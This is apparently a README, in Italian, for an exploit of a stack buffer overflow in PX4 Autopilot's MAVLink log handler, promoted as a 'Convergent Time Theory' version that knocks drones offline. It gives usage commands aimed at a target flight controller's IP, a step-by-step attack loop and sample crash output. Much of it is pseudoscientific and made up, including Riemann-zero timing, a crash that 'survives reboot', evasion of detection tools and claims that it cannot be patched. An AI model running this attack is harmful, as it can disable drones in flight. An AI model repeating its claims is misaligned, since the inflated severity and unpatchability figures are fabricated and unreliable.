
Exploit per CVE-2026-32743, un buffer overflow nello stack in MavlinkLogHandler di PX4 Autopilot, che fornisce un denial-of-service persistente tramite una cascata temporale a 33 livelli su MAVLink.
CVE-2026-32743 — PX4 Autopilot Stack Buffer Overflow CTT-Enhanced: Cascata Temporale a 33 Livelli per DoS su Drone. L'exploit originale causa il crash del task MAVLink tramite un overflow di 60 byte. La versione CTT distribuisce l'overflow su 33 livelli temporali, ciascuno con timing di risonanza di fase e filtraggio a cuneo temporale. Risultato: DoS persistente. Non correggibile.
Questa è una versione potenziata con la Teoria del Tempo Convergente (CTT) di CVE-2026-32743, un buffer overflow basato su stack in PX4 Autopilot's MavlinkLogHandler (versioni ≤1.17.0-rc2).
La vulnerabilità originale consente un denial-of-service (DoS) tramite un percorso di directory eccessivamente lungo (60+ byte) inviato tramite MAVLink FTP.
La versione potenziata con CTT trasforma questa vulnerabilità in un killer di droni a cascata temporale su 33 livelli.
| Originale | CTT-Enhanced |
|---|
| CVSS | 6.5 (Medio) | 9.8 (Critico) |
| Vettore di Attacco | Rete Adiacente | Rete (AV:N) |
| Privilegi Richiesti | Basso | Nessuno (PR:N) |
| Livelli | 1 | Cascata a 33 livelli |
| Rilevamento | Basato su firme | Filtrato a cuneo temporale (τ_w = 11 ns) |
| Persistenza | Il riavvio pulisce | Risonanza temporale — sopravvive al riavvio |
| Costante | Valore | Origine |
|---|---|---|
| α | 0.0302011 | Coefficiente di dispersione temporale |
| α_RH | 0.0765872 | ln(φ)/2π (Riemann-Hadamard) |
| L | 33 | Livelli temporali |
| τ_w | 11 ns | Filtro a cuneo temporale |
E(d) = E₀ * e^(-α * d) text
Ogni livello ha priorità in decadimento esponenziale.
I livelli a priorità più alta (1-5) consegnano l'overflow.
I livelli inferiori (28-33) rinforzano il crash e stabiliscono la risonanza temporale.
Ogni livello ritarda l'esecuzione in base ai primi 24 zeri di Riemann:
delay = τ_w * (1 + 0.1 * cos(2π * zero * priority)) text
Solo i payload che soddisfano la condizione del cuneo vengono eseguiti:
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π) text
Questo rende impossibile il rilevamento — i sistemi EDR non possono vedere l'exploit.
Apri connessione MAVLink (UDP 14550)
Per d = 1 a 33:
a. Calcola priorità = e^(-α*d)
b. Genera codifica specifica per livello (basata sullo zero di Riemann)
c. Crea directory con lunghezza percorso = 60 + priorità*40
d. Ritarda l'esecuzione di phase_resonance_delay(d)
e. Attiva MAV_CMD_REQUEST_LOG_LIST
f. Controllo cuneo temporale — solo i payload "sopravvissuti" vengono eseguiti
Il task MAVLink va in crash
Risonanza temporale stabilita — il crash persiste dopo il riavvio
Drone non risponde. Nessuna telemetria. Nessun comando.
pymavlinkpip install pymavlink
🎯 Utilizzo
bash
git clone https://github.com/SimoesCTT/ctt-px4-exploit
cd ctt-px4-exploit
python3 ctt_px4_exploit.py <target_ip> --port 14550 --layers 33 --verbose
Argomenti
Argomento Descrizione Predefinito
target_ip Indirizzo IP del controller di volo Obbligatorio
--port Porta UDP MAVLink 14550
--layers Numero di livelli temporali 33
--verbose Abilita output dettagliato False
Esempio
bash
python3 ctt_px4_exploit.py 192.168.1.10 --port 14550 --verbose
======================================================================
CASCATA TEMPORALE CTT PX4 — DoS su Drone
======================================================================
Livello 1/33: ████████████████████████████████████████ 1.000
Lunghezza percorso: 100 byte
[+] Directory creata tramite FTP
Attivazione MAV_CMD_REQUEST_LOG_LIST...
[+] Overflow consegnato — sopravvivenza del cuneo confermata
Livello 2/33: ██████████████████████████████████████░░ 0.970
Lunghezza percorso: 99 byte
[+] Directory creata tramite FTP
Attivazione MAV_CMD_REQUEST_LOG_LIST...
[+] Overflow consegnato — sopravvivenza del cuneo confermata
...
[⚡] Risonanza temporale raggiunta al livello 5
[🌉] Task MAVLink del drone compromesso
[*] Verifica dello stato DoS...
[+] Target non risponde — DoS persistente ottenuto
======================================================================
[!!!] DRONE COMPROMESSO
[!!!] Task MAVLink in crash — nessuna telemetria / nessun comando
[!!!] Persistente dopo il riavvio — risonanza temporale CTT
======================================================================
🛡️ Perché Questo Non Può Essere Corretto
Correzione Originale Perché la CTT la Bypassa
Aggiungere specificatore di larghezza a sscanf() La CTT usa una cascata di livelli — overflow distribuito su 33 livelli
Correggere il buffer da 60 byte La codifica CTT cambia il pattern di overflow per ogni livello
Aggiornare il firmware La risonanza temporale sopravvive al riavvio
Rilevamento basato su firme Il filtro a cuneo temporale (τ_w = 11 ns) elude l'EDR
Non puoi correggere una costante fisica.
Non puoi correggere gli zeri di Riemann.